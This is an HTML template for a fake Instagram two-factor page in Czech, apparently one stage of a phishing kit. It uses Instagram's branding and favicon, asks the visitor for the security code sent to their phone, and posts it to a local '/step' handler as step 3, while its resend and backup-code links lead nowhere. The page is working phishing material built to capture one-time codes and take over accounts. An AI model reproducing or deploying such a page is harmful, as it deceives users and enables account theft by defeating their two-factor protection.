<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Přihlásit se • Instagram</title>
    <link rel="icon" sizes="192x192" href="https://www.instagram.com/static/images/ico/favicon-192.png/68d99ba29cc8.png">
    <link rel="stylesheet" type="text/css" href="/static/styles/instagram.css">
    <style>
      {{ adictional_style | safe }}
    </style>
  </head>
  <body>
    <div class="box_main">
      <img style="width: 76px; margin: 5px;" height="76" width="76" src="/static/img/padlockincircle.png">
      <p size="10px">Zadejte kód, který jsme odeslali na Vaše telefonní číslo.</p>
      <form id="box_input" action="/step" method="POST">
        <input type="hidden" name="step_number" value="3">
        <div id="box_input-code">
          <p class="placeholder">Bezpečnostní kód</p>
          <input type="number" name="code" onclick="document.getElementsByClassName('placeholder')[0].style.display = 'none';">
        </div>
        <input id="box_input-submit" type="submit" value="Potvrdit">
      </form>
      <p id="bad_code">Zkontrolujte bezpečnostní kód a zkuste to znovu.</p>
      <div class="another_options">
        <p>Nepřišel vám bezpečnostní kód? Můžeme vám ho <a>poslat znovu</a>.</p>
        </br>
        <p>Pokud nemůžete bezpečnostní kód přijmout, použijte některý ze <a>záložních kódů</a>.</p>
      </div>
    </div>
  </body>
</html>
